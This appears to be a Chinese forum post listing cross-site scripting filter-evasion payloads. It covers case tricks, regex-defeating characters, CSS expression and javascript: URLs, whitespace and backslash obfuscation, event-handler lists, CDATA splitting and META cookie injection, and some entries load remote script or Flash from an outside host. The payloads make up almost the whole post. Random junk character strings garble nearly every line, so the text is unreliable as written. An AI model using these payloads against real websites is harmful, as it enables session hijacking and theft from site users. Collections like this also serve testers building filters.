1. 改变字符大小写
9 I9 \! ~* x9 [( ?0 W! N. l/ u3 A9 l9 ^8 D5 i
) k, r, @2 U% O9 j& i8 I: z8 s$ }% K& G: n- V
<sCript>alert(‘d’)</scRipT>' w2 c' z+ S" ^
6 B) W2 m6 g' _" N: R% g- j: |
2. 利用多加一些其它字符来规避Regular Expression的检查6 n- ~( ], x; y, S$ J
7 S5 j# ~2 \; U& H
<<script>alert(‘c’)//<</script>- f% |; U. p/ U& d( ~9 A4 F9 N0 P2 P
' a. G, b+ h, @* u <SCRIPT a=">" SRC="t.js"></SCRIPT>9 _- b6 s! L& S) N$ l- O. Z/ t
; c; I! n# G- _! i
<SCRIPT =">" SRC="t.js"></SCRIPT>
9 w: I- S3 V7 |& i1 C$ a( F: O
6 F, G( B' W" c7 f" {4 x" y% Q <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
( c2 V7 b% A1 k3 p( b8 T7 z' y! g, g. i* t2 `* j+ V3 H e* T
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>4 r8 h5 F# g6 f, S' s' x0 Y0 {
1 S& D1 G7 Q& c2 b <SCRIPT a=`>` SRC="t.js"></SCRIPT>
0 j, r' Q" L( u N/ m' }0 e% q: m# r# ?( ?3 T: L( o& ~& L
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
& b5 l: N& S E& w. L7 n- q+ X4 J& C: k" D' {/ W& U
3. 以其它扩展名取代.js
, e. g7 H8 K1 z* u9 l0 p
( N4 R6 w& L% `& L5 B" k% F <script src="bad.jpg"></script>
4 y9 L' r5 a3 M3 @; s% x+ b! x0 J7 ~( i) f/ g6 D, a
4. 将Javascript写在CSS档里8 e' w; {: _6 `( d% S( E R9 z
1 O& `; ^7 N( F$ O0 P
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
$ [( ^: W. l8 i# ]) m+ P
' _/ N4 E! Q" M example:
. R7 Q& z8 g. D3 t5 U3 h7 I0 ~9 p+ K
body {
2 a6 N3 r4 Z6 G5 `# V% r- r4 Y( n) L* g9 J8 f. r$ N5 K& r
background-image: url(‘javascript:alert("XSS");’) ?" y. P6 g" i9 g; E
$ |; k* ~5 N6 }! y/ ? }
4 c" C3 v5 U" ]1 ]' z$ d9 F; F$ |1 J# Y# \5 t3 T7 A+ \
5. 在script的tag里加入一些其它字符9 r& [1 i* m- t" P* A, s
, e$ E2 u# y3 s! U3 H <SCRIPT/SRC="t.js"></SCRIPT>
) A- l: I& W$ _' ^1 w6 u. l- Q
' M! ?: @+ }3 z# n <SCRIPT/anyword SRC="t.js"></SCRIPT>
" H0 O2 u' \ u% u( e5 l, y# }4 k- t" B1 k9 k$ q7 \
6. 使用tab或是new line来规避
^9 R$ a& |1 T. E6 f
) n' ?; G# j7 l) t/ ?3 L <img src="jav ascr ipt:alert(‘XSS3′)">0 u: V2 f; A& {/ D
6 g0 s8 [, _2 k0 J$ o& n <img src="jav ascr ipt:alert(‘XSS3′)">
4 b) V+ L1 m# E% }! [; d* m& [7 @ ^& h9 V, r1 o' Q v. o
<IMG SRC="jav ascript:alert(‘XSS’);">
* t( b3 \9 ^9 `, z" x- v4 V- o5 i) |5 R& ?9 N2 n+ d
-> tag
9 _9 S. ], Y# Q+ g8 C: t* H
" A8 y( l" ]5 O% B0 G0 | -> new line
; P4 `& I! |4 X: @! V3 y0 K- f) A9 p& t' n) i; [( B
7. 使用"\"来规避
7 G6 _3 k q" ^$ B5 n9 z v+ K
' y! l b( M0 z: s4 r <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>1 x% S. c$ x$ e. q
0 s* g6 T: T' ]8 |5 M V <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
$ q+ C" F0 V; [, p/ H" O1 m9 v3 `: p7 B# |( ?5 I
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
, B0 M6 Z. ^$ }9 m! V
I! N1 Q/ ]) B7 [ <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
- N1 j7 t) ]3 h5 C! `
1 @7 o/ @& U/ b- x' e% } <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>. @0 ]& d6 ~4 o, K! b! I
V! H2 Y- ?# ?6 I# q: B Q
8. 使用Hex encode来规避(也可能会把";"拿掉)
1 t# M) i/ V& p* E2 W2 e# l) `$ w% s# |+ D) S2 P% v8 ^
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
. Q: m6 n, n7 i( O. l( p6 g/ f O4 j( J% y% q
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">8 y& w' a: z4 d% ~
- t! W/ d8 _3 N! M/ G6 E <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
( P* e! m1 f) D) i+ M" x+ `+ ~1 u+ E7 D. {5 v
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
5 U: I# w9 ^) J2 l6 M
* m1 T4 |! U' f- ?( z5 Y& A1 j9. script in HTML tag
2 f; B# g3 `! M$ g* g9 p7 L) Q, D
<body onload=」alert(‘onload’)」>
, x1 K* o7 Q4 o- w; k* t# B3 S9 {/ y$ S
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
c& U# d1 {9 |9 I. b: p0 H& v
# F4 n) B, b5 s9 T10. 在swf里含有xss的code
& l2 r% p+ J- C7 m. n
. E5 |7 O; h) @5 n) T <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>: P& E4 m$ M# X( j# @; [
8 K. @+ O) O, G0 C& R% s11. 利用CDATA将xss的code拆开,再组合起来。
: x2 j7 P* Y( Z2 x6 Y& z9 H/ J
<XML ID=I><X><C>: V$ w/ o# l2 T, c- u" ?
6 v2 ~4 H/ }6 Y7 f* ^
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>. s# n4 h$ n9 ` i
8 m9 ]: \9 H+ ]- T2 f4 `& x" {8 v5 e </C></X>
* E5 g$ U7 B6 [# W2 X
" o& \# j5 ]2 o5 t! G- F) F: {/ ~ </xml>( ?# r& ~3 V0 p( u7 j
I) g- f# f- }$ L7 i, m; T0 ?9 S' M <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>' x( {) V" a' B# W7 F: `, {; j( `% H
J2 ] W. i) r" C) ` <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>7 t! \: u; `$ @3 T: S* `
7 b5 z9 n( e2 J( b! b$ V
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>7 Q, V9 }% A9 \+ |9 u% F( ?7 N5 C
/ o J( f" x$ W( s: P1 m
12. 利用HTML+TIME。' g4 Y/ u- S* |- \ W, y+ @
/ t% C1 T) N1 Q$ P <HTML><BODY>
: J7 L! K k/ X+ B. D) |, O f
! @6 p7 }9 l, y# p! s. C* D <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
$ w2 i' y7 F/ @5 ^: f( R2 C
( @! M L* k6 m% P) L <?import namespace="t" implementation="#default#time2">
0 y0 K" D+ z- p5 V; M+ z$ z- A. q5 z+ \
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">4 P" g; O, q$ U$ A' X2 f
# Q6 Y9 s* X3 R- f8 ` </BODY></HTML>2 D# A; r4 `4 B& J3 x& x3 v
6 X. U, E) v8 j$ y' j% g13. 透过META写入Cookie。
( B8 h$ a" R# ?
# ? q2 d& b5 |" S q! p <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
" ?4 y) p1 B, B) z1 @* X" A$ a9 c& C# f6 g N7 P. o# v
14. javascript in src , href , url
; ^9 g B( m7 Y/ q
+ ^+ }4 G$ t( C' v1 M: {2 k9 D2 w <IFRAME SRC=javascript:alert(’13′)></IFRAME>
& U; |% s! Z6 a3 G e# W) q5 V* K/ G* X1 q+ U, @) f# u
<img src="javascript:alert(‘XSS3′)">% P! T9 `3 T& U6 k- ^2 y
( G' ?9 B3 P2 i- A* B+ A& X<IMG DYNSRC="javascript:alert(‘XSS20′)">
s0 t0 f8 ~; v- f( u& x: M
9 R4 v3 {/ T5 I5 x <IMG LOWSRC="javascript:alert(‘XSS21′)">
1 t! z( Z7 W( y; l6 M
2 w6 j: q4 @' [& E7 H: U0 v. O <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">- k6 q, b( C. }- x
' b% |$ p; l9 D+ t) T' i( N <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
& N* m$ g# e- m# B* R% M9 z- D4 g* {9 `3 m
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">! R+ A4 k% i3 t K/ R
: ^0 b4 P5 } Q0 s( R2 d { <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">) p7 g; C# X% U7 \' l
( r: b5 e. V" ? <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
. }/ D6 V( j. E& P% |
$ R2 r& }: x* w* |$ ` </STYLE><A CLASS=XSS></A>0 \: p& m- _* c0 ~* t% O- U$ ^3 d/ \5 X
2 y/ P# c% w8 g- M8 g; p+ O
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>5 H6 x" p( J& a7 R. U) ?3 G& ?
! D7 K) N" `" @# S# j |
发表于 2012-12-31 09:59:28
收藏
支持
反对